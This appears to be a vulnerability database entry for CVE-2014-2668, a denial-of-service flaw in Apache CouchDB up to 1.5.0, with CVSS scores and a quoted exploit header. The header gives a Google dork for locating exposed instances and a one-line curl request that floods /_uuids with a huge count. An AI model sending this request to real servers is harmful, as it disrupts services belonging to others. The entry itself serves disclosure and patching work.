5
CVSSv2

CVE-2014-2668

Published: 28/03/2014 Updated: 16/12/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

Apache CouchDB 1.5.0 and previous versions allows remote malicious users to cause a denial of service (CPU and memory consumption) via the count parameter to /_uuids.

Vulnerable Product Search on Vulmon Subscribe to Product

apache couchdb

Exploits

# Exploit Title: Couchdb uuids DOS exploit # Google Dork inurl: _uuids # Date: 03/24/2014 # Exploit Author: KrustyHack # Vendor Homepage: couchdbapacheorg/ # Software Link: couchdbapacheorg/ # Version: up to 150 # Tested on: Linux Couchdb up to 150 HOW TO ====== curl couchdb_target/_uuids?count=999999999999999999999999 ...